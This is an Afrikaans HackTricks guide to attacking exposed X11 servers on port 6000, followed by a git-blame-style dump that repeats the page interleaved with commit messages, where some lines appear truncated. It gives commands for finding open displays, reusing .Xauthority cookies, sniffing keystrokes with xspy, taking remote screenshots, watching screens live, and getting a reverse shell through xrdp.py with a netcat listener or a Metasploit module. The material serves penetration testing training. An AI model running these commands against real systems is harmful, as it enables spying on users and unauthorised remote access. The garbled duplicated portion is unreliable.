hacktricks/network-services-pentesting/6000-pentesting-x11.md

# 6000 - Pentesting X11

<details>

<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>

<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>

Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutbeloningsjagters te kommunikeer!

**Hacking-insigte**\
Tree in kontak met inhoud wat die opwinding en uitdagings van hack bevat

**Haknuus in Werklikheid**\
Bly op hoogte van die snelbewegende hackwêreld deur werklike nuus en insigte

**Nuutste Aankondigings**\
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings

**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!

## Basiese Inligting

**X Window System** (X) is 'n veelsydige venstersisteem wat algemeen voorkom op UNIX-gebaseerde bedryfstelsels. Dit bied 'n raamwerk vir die skep van grafiese **gebruikerskoppelvlakke (GUI's)**, met individuele programme wat die gebruikerskoppelvlakontwerp hanteer. Hierdie buigsaamheid maak verskeie en aanpasbare ervarings binne die X-omgewing moontlik.

**Verstekpoort:** 6000
```
PORT       STATE   SERVICE
6000/tcp   open    X11
```
## Opsomming

Kyk vir **anonieme verbinding:**
```bash
nmap -sV --script x11-access -p <PORT> <IP>
msf> use auxiliary/scanner/x11/open_x11
```
#### Plaaslike Opsomming

Die lêer **`.Xauthority`** in die gebruikers se tuisgids word **gebruik** deur **X11 vir magtiging**. Van [**hier**](https://stackoverflow.com/a/37367518):
```bash
$ xxd ~/.Xauthority
00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d  ............0..M
00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d  IT-MAGIC-COOKIE-
00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58  1...R.~..A.....X
00000030: 041d ef                                  ...
```
> MIT-magic-cookie-1: Die generering van 128-bitsleutel ("koekie"), wat gestoor word in \~/.Xauthority (of waar die XAUTHORITY envvar na wys). Die klient stuur dit ongekrypt na die bediener! Die bediener kontroleer of dit 'n kopie van hierdie "koekie" het en indien wel, word die verbinding toegelaat. Die sleutel word gegenereer deur DMX.

{% hint style="warning" %}
Om die koekie te **gebruik** moet jy die env-var stel: **`export XAUTHORITY=/pad/na/.Xauthority`**
{% endhint %}

#### Plaaslike Opsomming Sessie
```bash
$ w
23:50:48 up 1 day, 10:32,  1 user,  load average: 0.29, 6.48, 7.12
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
user     tty7     :0               13Oct23 76days 13:37   2.20s xfce4-session
```
In die voorbeeld, hardloop `localhost:0` xfce4-sessie.

## Bevestig Verbinding
```bash
xdpyinfo -display <ip>:<display>
xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
```
## Sleutelloggin

[xspy](http://tools.kali.org/sniffingspoofing/xspy) om die sleutelbordtoetse te snuif.

Voorbeeld Uitset:
```
xspy 10.9.xx.xx

opened 10.9.xx.xx:0 for snoopng
swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
```
## Skermbeskietings vaslê
```bash
xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
convert screenshot.xwd screenshot.png
```
## Afstandbeheerderige Aansig

Weg van: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
```
./xrdp.py <IP:0>
```
Weg van: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)

Eerste moet ons die ID van die venster vind deur xwininfo te gebruik
```
xwininfo -root -display 10.9.xx.xx:0

xwininfo: Window id: 0x45 (the root window) (has no name)

Absolute upper-left X:  0
Absolute upper-left Y:  0
Relative upper-left X:  0
Relative upper-left Y:  0
Width: 1024
Height: 768
Depth: 16
Visual: 0x21
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x20 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners:  +0+0  -0+0  -0-0  +0-0
-geometry 1024x768+0+0
```
**XWatchwin**

Vir **lewende vertoning** moet ons gebruik
```bash
./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
./xwatchwin 10.9.xx.xx:0 -w 0x45
```
## Kry Skul.
```
msf> use exploit/unix/x11/x11_keyboard_exec
```
Ander manier:

**Omgekeerde Shell:** Xrdp maak dit ook moontlik om 'n omgekeerde shell te neem via Netcat. Tik die volgende bevel in:
```bash
./xrdp.py \<IP:0> –no-disp
```
In die koppelvlak kan jy die **R-shell opsie** sien.

Begin dan 'n **Netcat luisteraar** op jou plaaslike stelsel op poort 5555.
```bash
nc -lvp 5555
```
Dan, plaas jou IP-adres en poort in die **R-Shell** opsie en klik op **R-shell** om 'n skaal te kry

## Verwysings

* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)

## Shodan

* `port:6000 x11`

<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>

Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters!

**Hack-insigte**\
Gaan aan met inhoud wat die opwinding en uitdagings van hack weergee

**Hack Nuus in Werklikheid**\
Bly op hoogte van die snelbewegende hackwêreld deur werklikheidsnuus en insigte

**Nuutste Aankondigings**\
Bly ingelig met die nuutste foutbelonings wat bekendgestel word en noodsaaklike platformopdaterings

**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!

<details>

<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Ander maniere om HackTricks te ondersteun:

* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.

</details>
-												GITBOOK-3816: No subject

											
										
										
											2023-03-05 19:54:13 +00:00
+								# 6000 - Pentesting X11
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Ander maniere om HackTricks te ondersteun:
-												arte

											
										
										
											2024-01-03 11:42:55 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-02-27 10:28:45 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutbeloningsjagters te kommunikeer!
-												hp

											
										
										
											2023-02-27 10:28:45 +01:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Hacking-insigte**\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								Tree in kontak met inhoud wat die opwinding en uitdagings van hack bevat
-												hp

											
										
										
											2023-02-27 10:28:45 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**Haknuus in Werklikheid**\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Bly op hoogte van die snelbewegende hackwêreld deur werklike nuus en insigte
-												hp

											
										
										
											2023-07-14 17:03:41 +02:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**Nuutste Aankondigings**\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings
-												hp

											
										
										
											2023-07-14 17:03:41 +02:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-												new link

											
										
										
											2022-11-05 10:07:43 +01:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Basiese Inligting
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**X Window System** (X) is 'n veelsydige venstersisteem wat algemeen voorkom op UNIX-gebaseerde bedryfstelsels. Dit bied 'n raamwerk vir die skep van grafiese **gebruikerskoppelvlakke (GUI's)**, met individuele programme wat die gebruikerskoppelvlakontwerp hanteer. Hierdie buigsaamheid maak verskeie en aanpasbare ervarings binne die X-omgewing moontlik.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								**Verstekpoort:** 6000
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								PORT       STATE   SERVICE
 /tcp   open    X11
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								## Opsomming
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Kyk vir **anonieme verbinding:**
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								nmap -sV --script x11-access -p <PORT> <IP>
 								msf> use auxiliary/scanner/x11/open_x11
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								#### Plaaslike Opsomming
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								Die lêer **`.Xauthority`** in die gebruikers se tuisgids word **gebruik** deur **X11 vir magtiging**. Van [**hier**](https://stackoverflow.com/a/37367518):
-												Update 6000-pentesting-x11.md

Add example for `xxd` and `w`. 

# Reference
https://0xdf.gitlab.io/2022/11/21/htb-squashed.html
											
										
										
											2023-12-29 00:56:54 -08:00
+								```bash
 								$ xxd ~/.Xauthority
 								00000000: 0100 0006 6d61 6e65 7063 0001 3000 124d  ............0..M
 								00000010: 4954 2d4d 4147 4943 2d43 4f4f 4b49 452d  IT-MAGIC-COOKIE-
 								00000020: 3100 108f 52b9 7ea8 f041 c49b 85d8 8f58  1...R.~..A.....X
 								00000030: 041d ef                                  ...
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								> MIT-magic-cookie-1: Die generering van 128-bitsleutel ("koekie"), wat gestoor word in \~/.Xauthority (of waar die XAUTHORITY envvar na wys). Die klient stuur dit ongekrypt na die bediener! Die bediener kontroleer of dit 'n kopie van hierdie "koekie" het en indien wel, word die verbinding toegelaat. Die sleutel word gegenereer deur DMX.
-												GITBOOK-3869: change request with no subject merged in GitBook

											
										
										
											2023-04-07 00:41:31 +00:00
 								{% hint style="warning" %}
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								Om die koekie te **gebruik** moet jy die env-var stel: **`export XAUTHORITY=/pad/na/.Xauthority`**
-												GITBOOK-3869: change request with no subject merged in GitBook

											
										
										
											2023-04-07 00:41:31 +00:00
+								{% endhint %}
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								#### Plaaslike Opsomming Sessie
-												Update 6000-pentesting-x11.md

Add example for `xxd` and `w`. 

# Reference
https://0xdf.gitlab.io/2022/11/21/htb-squashed.html
											
										
										
											2023-12-29 00:56:54 -08:00
+								```bash
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								$ w
 :50:48 up 1 day, 10:32,  1 user,  load average: 0.29, 6.48, 7.12
-												Update 6000-pentesting-x11.md

Add example for `xxd` and `w`. 

# Reference
https://0xdf.gitlab.io/2022/11/21/htb-squashed.html
											
										
										
											2023-12-29 00:56:54 -08:00
+								USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 								user     tty7     :0               13Oct23 76days 13:37   2.20s xfce4-session
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								In die voorbeeld, hardloop `localhost:0` xfce4-sessie.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								## Bevestig Verbinding
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								```bash
 								xdpyinfo -display <ip>:<display>
 								xwininfo -root -tree -display <IP>:<display> #Ex: xwininfo -root -tree -display 10.5.5.12:0
 								```
 								## Sleutelloggin
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								[xspy](http://tools.kali.org/sniffingspoofing/xspy) om die sleutelbordtoetse te snuif.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								Voorbeeld Uitset:
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								xspy 10.9.xx.xx
 								opened 10.9.xx.xx:0 for snoopng
 								swaBackSpaceCaps_Lock josephtTabcBackSpaceShift_L workShift_L 2123
 								qsaminusKP_Down KP_Begin KP_Down KP_Left KP_Insert TabRightLeftRightDeletebTabDownnTabKP_End KP_Right KP_Up KP_Down KP_Up KP_Up TabmtminusdBackSpacewinTab
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								## Skermbeskietings vaslê
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								xwd -root -screen -silent -display <TargetIP:0> > screenshot.xwd
 								convert screenshot.xwd screenshot.png
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								## Afstandbeheerderige Aansig
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Weg van: [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								./xrdp.py <IP:0>
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Weg van: [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								Eerste moet ons die ID van die venster vind deur xwininfo te gebruik
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								xwininfo -root -display 10.9.xx.xx:0
 								xwininfo: Window id: 0x45 (the root window) (has no name)
 								Absolute upper-left X:  0
 								Absolute upper-left Y:  0
 								Relative upper-left X:  0
 								Relative upper-left Y:  0
 								Width: 1024
 								Height: 768
 								Depth: 16
 								Visual: 0x21
 								Visual Class: TrueColor
 								Border width: 0
 								Class: InputOutput
 								Colormap: 0x20 (installed)
 								Bit Gravity State: ForgetGravity
 								Window Gravity State: NorthWestGravity
 								Backing Store State: NotUseful
 								Save Under State: no
 								Map State: IsViewable
 								Override Redirect State: no
 								Corners:  +0+0  -0+0  -0-0  +0-0
 								-geometry 1024x768+0+0
 								```
 								**XWatchwin**
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								Vir **lewende vertoning** moet ons gebruik
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```bash
 								./xwatchwin [-v] [-u UpdateTime] DisplayName { -w windowID | WindowName } -w window Id is the one found on xwininfo
 								./xwatchwin 10.9.xx.xx:0 -w 0x45
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								## Kry Skul.
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								```
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								msf> use exploit/unix/x11/x11_keyboard_exec
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Ander manier:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								**Omgekeerde Shell:** Xrdp maak dit ook moontlik om 'n omgekeerde shell te neem via Netcat. Tik die volgende bevel in:
-												a

											
										
										
											2024-02-08 22:36:35 +01:00
+								```bash
 								./xrdp.py \<IP:0> –no-disp
 								```
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								In die koppelvlak kan jy die **R-shell opsie** sien.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								Begin dan 'n **Netcat luisteraar** op jou plaaslike stelsel op poort 5555.
-												a

											
										
										
											2024-02-08 22:36:35 +01:00
+								```bash
 								nc -lvp 5555
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Dan, plaas jou IP-adres en poort in die **R-Shell** opsie en klik op **R-shell** om 'n skaal te kry
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								## Verwysings
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
-												a

											
										
										
											2024-02-08 22:36:35 +01:00
+								* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
 								* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
 								* [https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref](https://resources.infosecinstitute.com/exploiting-x11-unauthenticated-access/#gref)
-												GitBook: [master] one page modified
											
										
										
											2020-09-24 20:01:29 +00:00
-												GITBOOK-3816: No subject

											
										
										
											2023-03-05 19:54:13 +00:00
+								## Shodan
-												GitBook: [master] one page modified
											
										
										
											2020-09-24 20:01:29 +00:00
 								* `port:6000 x11`
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								<figure><img src="../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
-												hp

											
										
										
											2023-07-14 17:03:41 +02:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters!
-												new link

											
										
										
											2022-11-05 10:07:43 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**Hack-insigte**\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Gaan aan met inhoud wat die opwinding en uitdagings van hack weergee
-												hp

											
										
										
											2023-02-27 10:28:45 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**Hack Nuus in Werklikheid**\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Bly op hoogte van die snelbewegende hackwêreld deur werklikheidsnuus en insigte
-												hp

											
										
										
											2023-02-27 10:28:45 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**Nuutste Aankondigings**\
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								Bly ingelig met die nuutste foutbelonings wat bekendgestel word en noodsaaklike platformopdaterings
-												hp

											
										
										
											2023-02-27 10:28:45 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								**Sluit by ons aan op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-												new link

											
										
										
											2022-11-05 10:07:43 +01:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								Ander maniere om HackTricks te ondersteun:
-												arte

											
										
										
											2024-01-03 11:42:55 +01:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:31:04 +00:00
+								* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
-												Translated to Afrikaans

											
										
										
											2024-02-11 02:07:06 +00:00
+								* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA

											
										
										
											2024-04-07 05:33:57 +00:00
+								* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
 								* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 								* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>